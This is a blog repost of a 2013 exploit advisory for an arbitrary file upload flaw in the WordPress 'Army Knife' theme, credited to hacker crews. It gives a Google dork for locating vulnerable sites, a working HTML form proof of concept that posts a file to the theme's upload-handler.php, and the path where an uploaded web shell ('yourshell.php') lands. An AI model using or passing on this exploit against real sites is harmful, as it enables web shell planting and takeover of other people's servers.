LinuxSec Exploit

Nothing is Ever Locked

WordPress Army Knife CSRF File Upload Vulnerability

by Jack Wilder Leave a Comment

Exploit Title: WordPress Army Knife CSRF File Upload Vulnerability
Author: Bebyyers404
Date: 11/09/2013
Vendor Homepage: http://freelancewp.co

Themes Link: http://freelancewp.com/wordpress-theme/army-knife/
Infected File: upload-handler.php
Category: webapps/php
Google dork: inurl:/wp-content/themes/armyknife
Tested on : Windows/Linux

Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/armyknife/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

Shares

Reader Interactions

Leave a Reply

Your email address will not be published.

LinuxSec / 63 queries in 0.07 seconds